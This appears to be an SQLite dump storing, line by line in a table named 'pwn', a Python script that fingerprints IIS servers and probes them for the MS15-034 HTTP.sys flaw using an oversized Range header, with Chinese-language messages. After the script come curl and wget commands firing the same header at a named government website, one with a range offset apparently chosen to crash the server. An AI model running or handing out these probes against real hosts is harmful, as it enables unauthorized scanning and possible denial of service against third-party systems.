PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE pwn(data, text);
INSERT INTO pwn VALUES('#!/usr/bin/env python',NULL);
INSERT INTO pwn VALUES('# coding=utf-8',NULL);
INSERT INTO pwn VALUES('# -*- coding: utf-8 -*-',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('import requests',NULL);
INSERT INTO pwn VALUES('def identify_iis(domain):',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    req = requests.get(str(domain))',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    remote_server = req.headers[''server'']',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    if ''Microsoft-IIS'' in remote_server:',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('        print(u''服务是'' + remote_server)',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('        ms15_034_test(str(domain))',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    else:',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('        print(''服务器不是IIS\n可能是: '' + remote_server)',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('def ms15_034_test(domain):',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    print(''启动vuln检查！'')',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    headers = {''Host'': ''stuff'',''Range'': ''bytes=0-18446744073709551615''}',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    req = requests.get(str(domain), headers = headers)',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    if ''Requested Range Not Satisfiable'' in req.content:',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('        print ''存在HTTP.sys远程代码执行漏洞！''',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    elif ''The request has an invalid header name'' in req.content:',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('        print ''漏洞已修复''',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    else:',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('        print ''IIS服务无法显示漏洞是否存在，需要手动检测''',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('if __name__== ''__main__'':',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    usr_domain = raw_input(''输入域名扫描: '')',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('    identify_iis(usr_domain)',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('',NULL);
INSERT INTO pwn VALUES('curl http://www.yltjj.gov.cn/admin/scripts/common.js -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"|grep "range is not satisfiable"',NULL);
INSERT INTO pwn VALUES('wget http://www.yltjj.gov.cn/admin/scripts/common.js –debug –header=”Range: bytes=0-18446744073709551615″',NULL);
INSERT INTO pwn VALUES('wget http://www.yltjj.gov.cn/admin/scripts/common.js –header="Range:bytes=184900-18446744073709551615"',NULL);
COMMIT;
